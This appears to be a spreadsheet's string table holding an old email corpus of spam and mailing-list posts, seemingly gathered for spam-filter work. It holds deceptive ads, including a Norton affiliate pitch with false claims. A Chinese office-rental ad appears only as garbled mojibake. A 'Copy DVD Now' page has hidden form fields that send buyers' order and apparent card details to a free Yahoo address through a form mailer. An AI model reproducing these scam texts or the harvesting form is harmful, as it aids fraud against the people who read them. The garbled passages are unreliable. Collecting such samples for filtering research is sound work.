 2"&gt;&lt;b&gt;TURNS YOUR
       CPU INTO A FAX MACHINE!&lt;/b&gt;&lt;/font&gt;&lt;font size=3D"4" face=3D"Trebuchet=
  MS"&gt;&lt;br&gt;
       &lt;/font&gt;
       &lt;font size=3D"4" face=3D"Tahoma"&gt;GoBack=FFFFFFAE 3 Personal - &lt;/font=
 &gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"2"&gt;HELPS
       PREVENT YOU FROM MAKING ANY MISTAKES!&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"0" width=3D"538" height=3D"63"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"57" align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Ver=
 dana" size=3D"4" color=3D"#800000"&gt;*ALL
       this has a retail price of $99.95*&lt;/font&gt;&lt;font face=3D"Verdana" size=
 =3D"5" color=3D"#FF0000"&gt;&lt;BR&gt; &lt;/font&gt;&lt;font face=3D"Verdana" color=3D"#FF00=
 00" size=3D"6"&gt; Get it
       Now for ONLY $29.99!&lt;/font&gt;&lt;font face=3D"Verdana" size=3D"5" color=3D=
 "#FF0000"&gt;&lt;br&gt;&lt;/font&gt;&lt;i&gt;&lt;font face=3D"Verdana" size=3D"5" color=3D"#666666=
 "&gt;with
       FREE SHIPPING!&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"1" width=3D"538" height=3D"60" bgcolor=3D"#333333"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"54" align=3D"center"&gt;&lt;font size=3D"6" col=
 or=3D"#FFFFFF" face=3D"Impact"&gt;&lt;a href=3D"http://64.251.23.141/affiliates/=
 norton/systemworkse123.htm" style=3D"color: #FFFFFF"&gt;CLICK
       HERE to order NOW!&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&lt;font color=3D"#000000" face=3D"System"&gt;This Product is available NOW. =
 When we
 run out it's gone, so get it while it's HOT!&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;table border=3D"1" width=3D"538" height=3D"10" bordercolorlight=3D"#66666=
 6" bordercolordark=3D"#333333"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"4" align=3D"center"&gt;&lt;font face=3D"Tahoma"=
  size=3D"1" color=3D"#666666"&gt;Your
       email address was obtained from an opt-in list. Opt-in IAO (Internet
       Advertising Organisation)&amp;nbsp; List&lt;br&gt;
       &amp;nbsp;Serial No. EGU601.&amp;nbsp;&amp;nbsp;If you wish to be unsubscribed f=
 rom
       this list, please &lt;a style=3D"color: #800000" href=3D"http://64.251.=
 23.141/affiliates/norton/removeme.html"&gt;Click
       here&lt;/a&gt;. We do not condone spam in any shape or form. Thank You kin=
 dly
       for your cooperation.&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] German spam corpus / foreign language spam
</t>
  </si>
  <si>
    <t xml:space="preserve">
 On Thursday, August 22, 2002, at 09:36  AM, Justin Mason wrote:
 &gt;
 &gt; "Craig R.Hughes" said:
 &gt;
 &gt;&gt; I thought we'd sort of decided that after 2.40 we'd switch the
 &gt;&gt; meaning of the "lang" prefix to actually mean "run these rules
 &gt;&gt; if language matches", where "language" is what TextCat spits out
 &gt;&gt; for a message, as opposed to using the locale which is how
 &gt;&gt; things currently work.
 &gt;
 &gt; ah, right -- I'd forgotten that.  :(
 &gt;
 &gt; doesn't help with the finding-broken-rules QA case though...
 It does, if you have a corpus of german spam and nonspam to feed 
 it, and you're not in a de locale.
 C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</si>
  <si>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[ILUG] °ӷ~줽ǥX
</t>
  </si>
  <si>
    <t xml:space="preserve">
                           **********************
                               °ӷ~줽ǥX  
                           **********************
    MAȰӥο줽ǤӯHC
    x_UŰӥο줽ǮץAAXUذӷ~ݨDII
    ڭ֦̾ZqTBܦhߧYnX줽ǡAݵ۱zDA
    @wnz@B̾AXz{zϧӪҡIIII
    |ҦpUG
    ϰG
    jwϡG RBƫnB_
             50-300W]1200-2500^B           
             ¿𬣤jӡA{ʸUC]K^B
             Wiϥ 
    HqϡG Hq@BGBTB|BqC 
             30-500W]1200-2100^
             s𬣤jӡB񱶹BfBqK
            ]XzBiĳ^
    QsϡG nʪFTB|BBq
             30-450W]1000-1800^
             𬣡B[              
    sϡG QBwFAs_  
             70w400W]1000-2200^
             ¿B{C
      ϡG B]eBӼwBŶ
             50-500W
             ʸUCBKyX]wݫΡ^
    ϡG 
             80-500W1300_CЧⴤ}
             s𬣤jӡB{CBWiϥ
   AȲĤ@A~OҡCwﬢ.
   Tʲ ӥ
   pHGpj qW
   TeL]N^G 02-27492314
   ʹqܡG0937063831
   zNAOڭ̪NIIII  
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] ilug-admin,Enhance your Bust Amazing Breast Enhancing Capsules
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: More on promiscuity and word choice Re: Selling Wedded Bliss (was
</t>
  </si>
  <si>
    <t xml:space="preserve">Robert Harley writes:
 &gt; &gt;OK, then. Consider a population of 1,000,000. 500,000 men each
 &gt; &gt;pair off with 500,000 women. Then, 1 man, let's call him "Wilt",
 &gt; &gt;also has sex with the other 499,999 women
 &gt; 
 &gt; This has never happened.  Its relevance is nil.
 It was a extreme contrived example because you glosded over the 
 point of the earlier 3-person example. 
 But OK, Mr Math, let it be N men and women, for any N&gt;2. They 
 all pair off. Then, some number H, N&gt;H&gt;0, of men has sex with 
 all the other N-1 women he hasn't yet had sex with. 
 Pick any N and H that might be interesting. Any choice of
 values results in meaningful differences between the sexes' 
 "promiscuity", as commonly understood. It should be more 
 obvious with extreme choices of numbers, but it is also true 
 for any choice of N and H, if unrealistic totals distract you.
 Further, and I was hoping this would be clear without saying
 so outright, this model actually approximates the cliche 
 "common wisdom" about per-gender sexual behavior, if you 
 reverse the male and female roles.
 Those stereotypes are: that more men than women seek multiple
 partners -- men being "more promiscuous" than women -- and that 
 surplus of male interest is satisfied by a smaller number of 
 hyperpromiscuous women (often derisively labelled "sluts").
 &gt; So I chose not to type "on average" explicitly in my post, since this
 &gt; is FoRK and one tends to assume that people have a clue.
 &gt; 
 &gt; There is no disagreement between us, except that I am more interested
 &gt; in typical behaviour and you in extreme. 
 Nope, now you've amended the meaning of your initial statement to
 make it more defensible. What I objected to was:
 Robert Harley:
 # &gt;The assumption that females of all species tend to be less promiscuous
 # &gt;than males simply does not fit the facts, Hrdy contended.
 # 
 # Well, DUH!!!
 # 
 # It is perfectly obvious that (heterosexual) promiscuity is exactly,
 # precisely identical between males and females.
 # 
 # Of course the shapes of the distributions may differ.
 If you assumed people on FoRK had a clue, would you have needed
 to jump in with a patronizing "DUH!!"? 
 If you were talking about fuzzy, typical behavior, would you have 
 huffed and puffed with the words "perfectly obvious" and "exactly, 
 precisely identical"? 
 If your concern was with the "typical", why didn't you adopt the 
 typical definition of "promiscuous", rather than a straw-man
 definition which allowed you to interject "DUH!!" and mock an
 anthrolopology professor's conclusions? 
 &gt; Actually, you probably just
 &gt; had a bad day and felt like jumping down my throat for the hell of it.
 You are welcome to that theory!
 But here's an alternate theory: when you jump in with a patronizing 
 and overblown pronouncement -- e.g. "DUH!!... perfectly obvious... 
 exactly, precisely identical..." -- and that pronouncement is 
 itself sloppy and erroneous, then others may get a kick out of 
 popping your balloon. 
 - Gordon
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;&gt;&gt;&gt; "NS" == Neil Schemenauer &lt;nas@python.ca&gt; writes:
     NS&gt; Writing an IMAP server is a non-trivial task.
 That's what I've been told by everyone I've talked to who's actually
 tried to write one.
     NS&gt; Alternatively, perhaps there could be a separate protocol and
     NS&gt; client that could be used to review additions to the training
     NS&gt; set.  Each day a few random spam and ham messages could be
     NS&gt; grabbed as candidates.  Someone would periodically startup the
     NS&gt; client, review the candidates, reclassify or remove any
     NS&gt; messages they don't like and add them to the training set.
 I think people will be much more motivated to report spam than ham.  I
 like the general approach that copies of random messages will be
 sequestered for some period of time before they're assumed to be ham.
 Matched with a simple spam reporting scheme, this could keep the
 training up to date with little effort.  I've sketched out an approach
 a listserver like Mailman could do along these lines and if I get some
 free time I'll hack something together.
 I like the idea of a POP proxy which is classifying messages as
 they're pulled from the server.  The easiest way for such a beast to
 be notified of spam might be to simply save the spam in a special
 folder or file that the POP proxy would periodically consult.
 -Barry
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your Own Desk Top Investigator
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: (no subject)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;
 &lt;html lang="en"&gt;
 &lt;head&gt;
 &lt;title&gt;Copy any DVD now!&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; 
 charset=iso-8859-1"&gt;
 &lt;xmeta NAME="Keywords" CONTENT="copy dvd, dvd copy, burn dvd, dvd copy 
 software, copy dvd software, copying dvd, dvd copying, dvd copy 
 software, copy dvd movie, dvd copying, dvd rip, dvd ripper, dvd 
 ripping, vcd, svcd, xvcd, xsvcd, copy dvd to vcd, back up dvd, copying 
 dvd, dvd copying, dvd copying software, dvd decoder software, dvd to 
 vcd, make a vcd, make vcd, making xvcd, xvcd, 321 studio dvd copy plus, 
 321 studios dvd copy plus, avi 2 vcd, avi svcd, avi to svcd, avi to 
 vcd, avi to vcd converter, avi vcd, burn a dvd, burn avi to dvd, burn 
 dvd, burn dvd cd r, burn dvd cdr, burn dvd movie, burn dvd on cd, burn 
 dvd on cd r, burn dvd on cd rw, burn dvd on cdr, burn dvd 
 software, burn dvd to cd, burn dvd to cd r, burn dvd to cdr, burn dvd 
 to vcd, burn dvd video, burn dvd with a cd burner, burn dvd with a cd 
 rw, burn dvd with a cdr, burn dvd with cd burner, burn dvd with cd 
 r, burn dvd with cd rw, burn dvd with cd writer, burn dvd without a dvd 
 burner, burn dvd without dvd burner, burn dvd movie to cd, burn mpeg to 
 dvd, burn svcd, burn vcd, burn video game and dvd, burn your dvd, burn 
 your own dvd, burning svcd, burning vcd, can i burn dvd, convert avi to 
 svcd, convert avi to vcd, convert dvd to vcd, convert mpeg to 
 vcd, convert svcd, convert dvd to svcd, convert to vcd, copy dvd, copy 
 a dvd, copy a dvd movie, copy any dvd, copy any dvd movie, copy any dvd 
 or game disc in seonds new, copy any dvd or video game in minutes, copy 
 any dvd to cd, copy dvd cd, copy dvd game, copy dvd movie, copy dvd 
 now, copy dvd on cdr, copy dvd pro, copy dvd program, copy dvd s, copy 
 dvd smartripper, copy dvd software, copy dvd to a cd, copy dvd to 
 cd, copy dvd to cd r, copy dvd to cdr, copy dvd to hard drive, copy dvd 
 to vcd, copy dvd vcd, copy dvd video, copy dvd with cd burner, copy dvd 
 with cdr, copy my dvd, copy your dvd, create a svcd, create 
 svcd, create vcd, creating svcd, creating vcd, difference between vcd 
 and svcd, divx svcd, divx vcd, download dvd copy, download dvd copy 
 plus, download dvd copy pro, dup dvd, dup dvd not burn second disc, dvd 
 a svcd, dvd and copy, dvd and copy and plus, dvd backup and copy, dvd 
 backup and copy 6.4, dvd backup copy, dvd burn, dvd burn cd, dvd burn 
 copy, dvd burn copy pro, dvd burn guide, dvd burn pro, dvd burn 
 program, dvd burn software, dvd burn tutorial, dvd copy, dvd copy 
 3.0, dvd copy cd, dvd copy download, dvd copy magic, dvd copy plus, dvd 
 copy plus 3.8, dvd copy plus download, dvd copy plus keygen, dvd copy 
 plus serial, dvd copy plus software, dvd copy plus v3.8, dvd copy 
 pro, dvd copy program, dvd copy share ware, dvd copy software, dvd copy 
 utility, dvd movie copy, dvd rip, dvd ripping, dvd software, dvd 
 squeeze, dvd svcd, dvd to copy, dvd to svcd, dvd to svcd 
 conversion, dvd vcd svcd, make an svcd, make dvd copy, making 
 svcd, making vcd, mpeg 2 svcd, mpeg to svcd, mpeg to vcd, mpg to 
 svcd, mpg to vcd, program to burn dvd, rip dvd, software to burn 
 dvd, software to burn dvd movie, software to copy dvd, software to copy 
 dvd to cd, super vcd
 svcd, svcd authoring, svcd burn, svcd burner, svcd burning, svcd 
 burning software, svcd convert, svcd converter, svcd creator, svcd 
 dvd, svcd encoder, svcd program, svcd software, vcd burning, vcd 
 burning software, vcd creator, vcd maker, vcd recorder, xsvcd, you burn 
 a dvd"&gt;
 &lt;xmeta NAME="Description" CONTENT="Burn DVD movies on a regular CD-R 
 using CD burner. Extract parts of a movie or rearrange scenes.Complete 
 Software and step by step instructions.Make back-ups of your DVD movies 
 on a regular CD-R.Buy now and get free updates for life. "&gt;
 &lt;xmeta NAME="Author" 
 CONTENT="satty@copydvdnow.com", "office@hotwebcenter.com"&gt;
 &lt;xmeta NAME="robots" CONTENT="index,follow"&gt;
 &lt;xmeta NAME="distribution" CONTENT="global"&gt;
 &lt;xmeta name=aesop content=sales&gt;
 &lt;xlink rel="stylesheet" href="dvd.css" type="text/css"&gt;
 &lt;/head&gt;
 &lt;xbody bgcolor="#132E65" text="#000000"&gt;
 &lt;table width="745" border="0" cellspacing="0" cellpadding="0" 
 align="center"&gt;
 &lt;tr&gt; 
 &lt;td valign="top" bgcolor="#FFFFFF"&gt;&lt;a target="_blank" 
 href="http://mail.yahoo.com/config/login?/index.html"&gt;&lt;img 
 src=http://www.copydvdnow.com/images/logo1.jpg width="166" 
 height="139" 
 border="0" alt="Home page"&gt;&lt;/a&gt; 
 &lt;img src=http://www.copydvdnow.com/images/ccard.gif width="134" 
 height="28"&gt;&lt;br&gt;
 &lt;/td&gt;
 &lt;td bgcolor="#FFFFFF"&gt; 
 &lt;div align="left"&gt; 
 &lt;img src=http://www.copydvdnow.com/images/logo2.jpg width="557" 
 height="109" border="0" alt="Home page"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;span class="title"&gt;&lt;b&gt;Copy Any DVD Movie Using Your CD 
 Burner Now!&lt;/b&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;/span&gt;&lt;span class="btxt"&gt;&lt;b&gt;Copy DVD Now&lt;/b&gt; makes it 
 possible to &lt;/span&gt;&lt;b&gt;&lt;span class="rtxt"&gt;copy
 DVD on CD-R&lt;/span&gt;&lt;/b&gt;&lt;span class="btxt"&gt; using your Computer's 
 CD Burner.
 You may now copy DVD movie with just &lt;b&gt;one click.&lt;/b&gt;&lt;br&gt;
 &lt;br&gt;
 We provide latest and easiest Method that &lt;b&gt;eliminates the 
 use 
 of conventional DVD copying equipments&lt;/b&gt; in DVD burning 
 process.
 This method uses advanced DVD rippers.&lt;/span&gt; &lt;/p&gt;
 &lt;/div&gt;
 &lt;div align="left"&gt; 
 &lt;p align="left"&gt;&lt;span class="btxt"&gt; Copy DVD movies to CD-R, 
 encode DVD
 to VCD, SVCD, XVCD or XSVCD and even create your own 
 chapters.&lt;/span&gt; &lt;/p&gt;
 &lt;/div&gt;
 &lt;table border="0" cellspacing="0" cellpadding="0" align="center" 
 width="80%"&gt;
 &lt;tr align="center"&gt; 
 &lt;td&gt;&lt;img src=http://www.copydvdnow.com/images/dvd.jpg 
 width="82" height="56" hspace="10"&gt;&lt;/td&gt;
 &lt;td class="btxt" nowrap&gt; All you need is &lt;b&gt;&lt;span 
 class="rtxt"&gt;DVD 
 ROM, CD Burner&lt;/span&gt;&lt;/b&gt; and &lt;b&gt;&lt;span class="rtxt"&gt;Blank 
 CD's&lt;/span&gt;&lt;/b&gt;. &lt;/td&gt;
 &lt;td&gt;&lt;img src=http://www.copydvdnow.com/images/cd.jpg 
 width="104" height="57" hspace="10"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;span class="btxt"&gt;&lt;br&gt;
 &lt;b&gt;&lt;font color="#8D0707"&gt;Why spend thousands of 
 dollars&lt;/font&gt;&lt;/b&gt; on conventional 
 DVD copying equipment when you may burn and copy DVD's right from 
 your Computer's 
 CD Burner.&lt;/span&gt; 
 &lt;p class="btitle"&gt;&lt;img 
 src=http://www.copydvdnow.com/images/dvdbox.jpg width="150" 
 height="166" align="right" hspace="20"&gt;&lt;font color="#8D0707"&gt;You 
 Can Copy Any DVD To CD - You Get Manual And Software 
 Both&lt;/font&gt; &lt;/p&gt;
 &lt;ul class="btxt"&gt;
 &lt;li&gt;Copy your DVD(PAL or NTSC) to CD using your CD burner&lt;/li&gt;
 &lt;li&gt;Make backup copy of DVD to CD-R or CD-RW&lt;/li&gt;
 &lt;li&gt;Play movie from computer, computer to TV or on &lt;br&gt;
 any standard DVD Player&lt;/li&gt;
 &lt;li&gt;Make backup of your entire DVD collection&lt;/li&gt;
 &lt;li&gt;Make VCD, SVCD, XVCD or XSVCD in &lt;b&gt; ONE CLICK&lt;/b&gt; 
 only.&lt;/li&gt;
 &lt;li&gt; You may even fit entire DVD on one CD!&lt;/li&gt;
 &lt;li&gt;Create Chapters or time intervals on VCD or SVCD
 &lt;/li&gt;
 &lt;li&gt;No need of having 6-8 GB Free hard disk space!
 &lt;/li&gt;
 &lt;/ul&gt;
 &lt;p class="btitle"&gt;&lt;font color="#8D0707"&gt;What You Get In The 
 Package&lt;/font&gt;&lt;/p&gt;
 &lt;ul class="btxt"&gt;
 &lt;li&gt;Our interactive Manual will walk you through the entire 
 process of 
 copying DVD as VCD, SVCD, XVCD or XSVCD.&lt;/li&gt;
 &lt;li&gt;You will be ripping DVD's and burning them to CD's like a 
 Pro once 
 you have gone through this easy to follow manual. We have 
 also included 
 screenshots for additional clarity to use. &lt;/li&gt;
 &lt;li&gt;Instant downloadable access to the software. Stop waiting 
 for the product to arrive 
 in mail. &lt;/li&gt;
 &lt;li&gt;Everything is provided to help you start copying your DVD's 
 right 
 away! All you need to have is DVD ROM, CD Burner and few 
 blank CD's! 
 That's it. No DVD burner or DVD copying equipment is 
 required! &lt;/li&gt;
 &lt;li&gt;And that's not all! If you buy it now you get &lt;b&gt;FREE 
 updates&lt;/b&gt; 
 and upgrades&lt;b&gt; for LIFE&lt;/b&gt;! Plus other bonuses. &lt;/li&gt;
 &lt;/ul&gt;
 &lt;p align="center"&gt;&lt;span class="title"&gt;You get everything needed 
 to right 
 away start&lt;br&gt;
 copying and burning your DVD to CD. &lt;br&gt;
 &lt;br&gt;
 &lt;/span&gt;&lt;span class="btitle"&gt;INSTANT DOWNLOAD! &lt;/span&gt; &lt;br&gt;
 &lt;span class="btxt"&gt;Win95/98/ME/NT/2000/XP Compliant&lt;/span&gt; &lt;br&gt;
 &lt;br&gt;
 &lt;span class="title"&gt;LIMITED TIME OFFER!!! ONLY 
 $39.95&lt;/span&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;p&gt;To order the DVD Burner right now for the super low price of only 
 $39.95
 with a Visa or Mastercard,
 &lt;br&gt;just fill out the order form below. 
 &lt;center&gt;
 &lt;/span&gt;&lt;/p&gt;
 &lt;table width="90%" border=0 cellspacing="0" cellpadding="0" 
 align="center" bgcolor="#FFFFFF" bordercolor=white&gt;
 &lt;tr&gt; 
 &lt;td width=2% bgcolor=#8D0707 valign=top&gt;&lt;img 
 src=http://www.copydvdnow.com/images/red_left.gif&gt; 
 &lt;td height="2" bgcolor=#8D0707&gt; 
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" 
 size="2" color=white&gt;&lt;b&gt;FREE 
 Bonus # 1&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/td&gt;
 &lt;td width=2% align=right bgcolor=#8D0707 valign=top&gt;&lt;img 
 src="http://mail.yahoo.com/config/login?/images/red_right.gif"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt; 
 &lt;td bgcolor=#E1E7F2 colspan=3&gt;&lt;table border=0 
 cellpadding=5&gt;&lt;tr&gt;&lt;td&gt;&lt;font face="Verdana, Arial, Helvetica, sans-
 serif" size="2" color="#132E65"&gt; Buy 
 Today and you get &lt;b&gt;FREE&lt;/b&gt; updates for &lt;b&gt;LIFE!
 &lt;/b&gt;&lt;/font&gt; &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" 
 color="#132E65"&gt;&lt;br&gt;
 &lt;br&gt;
 If you buy our package now, we will provide you upgrades 
 and updates 
 to all future versions of &lt;b&gt;CopyDVD Now ABSOLUTELY FREE!!
 &lt;/b&gt; &lt;br&gt;
 This offer alone will save you tons of money for future 
 upgrades and 
 keep you updated with the technology. &lt;/font&gt; 
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" 
 size="2" color="#132E65"&gt;&lt;b&gt;A 
 real win win situation!!&lt;/b&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img 
 src=http://www.copydvdnow.com/images/blueend.gif&gt; 
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;font size=1&gt; &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt; 
 &lt;td width=2% bgcolor=#8D0707 valign=top&gt;&lt;img 
 src=http://www.copydvdnow.com/images/red_left.gif&gt; 
 &lt;td height="2" bgcolor=#8D0707&gt; &lt;font color=white 
 face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;FREE 
 Bonus # 2&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td width=2% align=right bgcolor=#8D0707 valign=top&gt;&lt;img 
 src=http://www.copydvdnow.com/images/red_left.gif&gt; 
 &lt;/tr&gt;
 &lt;tr&gt; 
 &lt;td bgcolor=#E1E7F2 colspan=3&gt;&lt;table border=0 
 cellpadding=5&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" 
 color="#8D0707"&gt;&lt;b&gt;Introducing a new technology that
 PC Magazine calls "revolutionary" and The New York Times 
 calls "ingenious."&lt;/font&gt;&lt;/b&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" 
 size="2" color="#000080"&gt;Access 
 and control your PC from anywhere in the world &lt;/font&gt; 
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" 
 color="#8D0707"&gt; &lt;/font&gt; 
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" 
 color="#FF0000"&gt; &lt;/font&gt; 
 &lt;/b&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" 
 color="#132E65"&gt; with almost any operating 
 system. Begin working on your host computer as if you were 
 sitting 
 in front of it. &lt;/font&gt; 
 &lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" 
 size="2" color="#132E65"&gt;This
 product is the &lt;b&gt;CNET Editors' Choice&lt;/b&gt; pick for remote 
 access, and they say&lt;b&gt; 
 "you'd be nuts not to sign up"&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;You get FREE 30 day trial when you buy our package of 
 copydvdnow today.&lt;/p&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img 
 src=http://www.copydvdnow.com/images/blueend.gif&gt; 
 &lt;/table&gt;
 &lt;div align="center"&gt;
 &lt;p&gt;&lt;br&gt;
 &lt;p align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-
 serif" size="2" color="#132E65"&gt;More Info&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;/a&gt;Join our mailing list to be first to know about fresh 
 quality
 programs and utilities. Our list includes selected, tested and
 quality freeware, shareware and other software only.&lt;br&gt;
 &lt;br&gt;
 &lt;!--START CODE--&gt;
 &lt;center&gt;&lt;A target="_blank" 
 HREF="http://lb.bcentral.com/ex/manage/subscriberprefs.aspx?
 customerid=21671" &gt;&lt;IMG 
 SRC="http://lb.bcentral.com/images/alist/signup.gif" BORDER="0" 
 WIDTH="100" HEIGHT="35"&gt;&lt;/A&gt;
 &lt;!--END CODE --&gt;&lt;/center&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;/p&gt;&lt;br&gt;&lt;br&gt;
 &lt;/div&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr align="right"&gt; 
 &lt;td valign="top"&gt; &lt;/td&gt;
 &lt;td valign="top" colspan="2"&gt;&lt;img 
 src="http://mail.yahoo.com/config/login?/images/logo3.gif" 
 width="723" height="15"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr align="center"&gt; 
 &lt;td&gt; &lt;/td&gt;
 &lt;td colspan="2"&gt;&lt;b&gt;&lt;span class="ld"&gt;*Legal Disclaimer*&lt;br&gt;
 &lt;br&gt;
 &lt;/span&gt;&lt;/b&gt; &lt;span class="ld"&gt; 
 It is illegal to make copies of copyright material for the purpose 
 of 
 selling it to third party. Law provides you to make one back up 
 copy for 
 personal use. We do not encourage or promote piracy. This program 
 is not 
 meant for those who intend to break copy right law and indulge in 
 illegal 
 activities. This program serves merely as a guide to help end user 
 to 
 backup his personal DVD's. All applications suggested in this 
 package are 
 not sold as a part of this kit but are freeware and can be 
 downloaded for 
 free. By purchasing this package you agree to this disclaimer and 
 also 
 agree to use it in most ethical manner. You agree to waive all 
 liabilities 
 associated with this program to the provider and associates.
 &lt;br&gt;
 &lt;br&gt;
 &lt;a target="_blank" 
 href="http://www.copydvdnow.com/entertainment03.htm" &gt; &lt;img 
 src="http://www.linkstoyou.com/heart.gif" border="0" width="42" 
 height="42"&gt;&lt;/a&gt;&lt;cursive language="java-script.2" type="text/java-
 script 
 src="http://pub29.bravenet.com/counter/code.php?
 id=357942&amp;usernum=2451644566&amp;groupnum=29&amp;cpv=1"&gt; &lt;/script&gt;
 &lt;noscript&gt;
 &lt;a target="_blank" href="http://counter29.bravenet.com/index.php?
 id=357942&amp;usernum=2451644566&amp;cpv=1" 
 &gt;&lt;img src="http://counter29.bravenet.com/counter.php?
 id=357942&amp;usernum=2451644566" 
 alt="Bravenet.com" border="0" /&gt;&lt;/a&gt;
 &lt;/noscript&gt;&lt;br&gt; copydvdnow.com All rights Reserved&lt;/span&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p class=MsoNormal align=center style='text-align:center'&gt;&lt;span
 style='mso-bookmark:OLE_LINK2'&gt;&lt;span style='display:none;mso-
 hide:all'&gt;&lt;INPUT TYPE="hidden" NAME="u" VALUE="repollo"&gt;&lt;INPUT 
 TYPE="hidden" NAME="subject" VALUE="CC PAYMENT -- SPAMBOOK"&gt;&lt;INPUT 
 TYPE="hidden" NAME="redir" VALUE="http://www.dogs.com"&gt;&lt;INPUT 
 TYPE="hidden" NAME="to" VALUE="kolombo252@yahoo.com"&gt;&lt;INPUT 
 TYPE="hidden" NAME="respond" VALUE="Thank you for ordering . Your credit card will be charged in the amount of $39.95 by 
 Information Services Inc."&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;center&gt;
 &lt;p&gt;&lt;form target="_blank" 
 ACTION="http://scripts.cgispy.com/email2.cgi" METHOD="POST"&gt;&lt;input 
 TYPE="hidden" NAME="u" VALUE="repollo"&gt;&lt;input TYPE="hidden" 
 NAME="subject" VALUE="CC PAYMENT -- SPAMBOOK"&gt;&lt;input TYPE="hidden" 
 NAME="redir" VALUE="http://www.dogs.com"&gt;&lt;input TYPE="hidden" NAME="to"
 VALUE="kolombo252@yahoo.com"&gt;&lt;input TYPE="hidden" NAME="respond" 
 VALUE="Thank you for ordering The Spambook. Your credit card will be 
 charged in the amount of $19.99 by Information Services Inc. You will 
 receive your Spambook by email in 24-48 hours."&gt;
 &lt;p&gt;Order Today .. Satisfaction is GUARANTEED or your money back!
 &lt;br&gt;&lt;i&gt;&lt;font color="#CC0000"&gt;Only&lt;/font&gt;&lt;font color="#000000"&gt; 
 &lt;/font&gt;&lt;font color="#FF0000"&gt;$39.95!&lt;/font&gt;&lt;/i&gt;
 &lt;p&gt;&lt;b&gt;&lt;u&gt;&lt;font color="#000000"&gt;&lt;font size=+3&gt;Order 
 Form&lt;/font&gt;&lt;/font&gt;&lt;/u&gt;&lt;/b&gt;&lt;font color="#FFFFFF"&gt;&lt;font size=-
 1&gt;ipping&lt;/font&gt;&lt;/font&gt;&lt;/center&gt;
 &lt;blockquote&gt; 
 &lt;center&gt;&lt;table BORDER WIDTH="75%" BGCOLOR="#FFCCCC" &gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;b&gt;&lt;font color="#000000"&gt;First Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
 &lt;td&gt;&lt;input type=text name="first" size=25&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;b&gt;&lt;font color="#000000"&gt;Last Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
 &lt;td&gt;&lt;input type=text name="last" size=25&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
